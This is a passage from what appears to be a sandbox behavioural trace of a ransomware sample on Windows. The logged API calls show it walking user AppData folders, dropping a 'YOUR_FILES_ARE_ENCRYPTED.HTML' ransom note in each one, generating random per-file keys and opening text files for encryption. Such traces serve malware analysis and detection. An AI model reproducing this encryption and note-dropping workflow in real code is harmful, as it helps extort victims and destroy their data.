dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.294] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.295] CloseHandle (hObject=0x214) returned 1 [0119.295] GetProcessHeap () returned 0x600000 [0119.295] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.295] GetProcessHeap () returned 0x600000 [0119.295] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.297] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605908ab, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605908ab, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0119.297] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.297] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache") returned 99 [0119.297] GetProcessHeap () returned 0x600000 [0119.297] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.298] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache" [0119.298] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\*" [0119.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605908ab, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605908ab, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.298] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605908ab, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605908ab, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.299] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605908ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605908ab, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605908ab, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 0 [0119.299] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.299] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0119.299] GetProcessHeap () returned 0x600000 [0119.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.300] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.301] CloseHandle (hObject=0x214) returned 1 [0119.301] GetProcessHeap () returned 0x600000 [0119.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.301] GetProcessHeap () returned 0x600000 [0119.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.301] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x7196220b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98b617a5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0119.301] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.301] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState") returned 99 [0119.301] GetProcessHeap () returned 0x600000 [0119.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.301] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState" [0119.301] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\*" [0119.301] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x7196220b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98b617a5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.302] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x7196220b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98b617a5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.302] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7196220b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xa8d0d401, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa8d0d401, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="DeviceSearchCache", cAlternateFileName="DEVICE~1")) returned 1 [0119.302] StrStrIW (lpFirst="DeviceSearchCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.302] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache") returned 117 [0119.302] GetProcessHeap () returned 0x600000 [0119.302] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.303] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache" [0119.303] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\*" [0119.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7196220b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xa8d0d401, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa8d0d401, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.303] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7196220b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xa8d0d401, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa8d0d401, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.303] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ec200f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x66eca8d6, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x66eca8d6, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ab, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="AppCache132586264905672075.txt", cAlternateFileName="APPCAC~2.TXT")) returned 1 [0119.303] StrStrIW (lpFirst="AppCache132586264905672075.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.303] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt") returned 148 [0119.303] PathFindExtensionW (pszPath="AppCache132586264905672075.txt") returned=".txt" [0119.303] lstrlenW (lpString=".txt") returned 4 [0119.303] PathFindExtensionW (pszPath="AppCache132586264905672075.txt") returned=".txt" [0119.303] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\appcache132586264905672075.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.305] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=108459) returned 1 [0119.305] GetProcessHeap () returned 0x600000 [0119.305] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.307] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="C9") returned 2 [0119.307] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="60") returned 2 [0119.307] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="98") returned 2 [0119.307] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="C7") returned 2 [0119.307] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="68") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="5F") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="68") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="1D") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="55") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="27") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="59") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="12") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="C4") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="AA") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="54") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="16") returned 2 [0119.307] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="1E") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="5A") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="BB") returned 2 [0119.308] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="7B") returned 2 [0119.308] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="F6") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="1F") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="A9") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="B3") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="44") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="20") returned 2 [0119.308] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="E0") returned 2 [0119.308] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="FB") returned 2 [0119.308] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="3B") returned 2 [0119.308] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="A7") returned 2 [0119.308] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="BD") returned 2 [0119.308] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="15") returned 2 [0119.308] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905672075.txt" [0119.308] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.309] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.312] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6725f45d, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x67262f2b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x672642b1, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ab, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="AppCache132586264905700947.txt", cAlternateFileName="APPCAC~1.TXT")) returned 1 [0119.313] StrStrIW (lpFirst="AppCache132586264905700947.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.313] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt") returned 148 [0119.313] PathFindExtensionW (pszPath="AppCache132586264905700947.txt") returned=".txt" [0119.313] lstrlenW (lpString=".txt") returned 4 [0119.313] PathFindExtensionW (pszPath="AppCache132586264905700947.txt") returned=".txt" [0119.313] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\appcache132586264905700947.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.313] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=108459) returned 1 [0119.313] GetProcessHeap () returned 0x600000 [0119.313] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.314] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="7C") returned 2 [0119.314] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="5C") returned 2 [0119.314] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="25") returned 2 [0119.314] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="A2") returned 2 [0119.314] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="9D") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="07") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="53") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="9F") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="31") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="6A") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="19") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="2D") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="2D") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="84") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="91") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="FE") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="A5") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="87") returned 2 [0119.314] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="EE") returned 2 [0119.314] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="62") returned 2 [0119.315] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="77") returned 2 [0119.315] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="16") returned 2 [0119.315] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="D5") returned 2 [0119.315] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="22") returned 2 [0119.315] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="D3") returned 2 [0119.315] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="3F") returned 2 [0119.315] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="97") returned 2 [0119.315] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="33") returned 2 [0119.315] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="5C") returned 2 [0119.315] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="C0") returned 2 [0119.315] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="DF") returned 2 [0119.315] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="18") returned 2 [0119.315] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132586264905700947.txt" [0119.315] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.315] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.319] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c74ae9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa8c834ea, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa8d04b48, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ab, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="AppCache132632415053778717.txt", cAlternateFileName="APPCAC~3.TXT")) returned 1 [0119.319] StrStrIW (lpFirst="AppCache132632415053778717.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.319] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt") returned 148 [0119.319] PathFindExtensionW (pszPath="AppCache132632415053778717.txt") returned=".txt" [0119.319] lstrlenW (lpString=".txt") returned 4 [0119.319] PathFindExtensionW (pszPath="AppCache132632415053778717.txt") returned=".txt" [0119.319] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\DeviceSearchCache\\AppCache132632415053778717.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\devicesearchcache\\appcache132632415053778717.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.322] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=108459) returned 1 [0119.322] GetProcessHeap () returned 0x600000 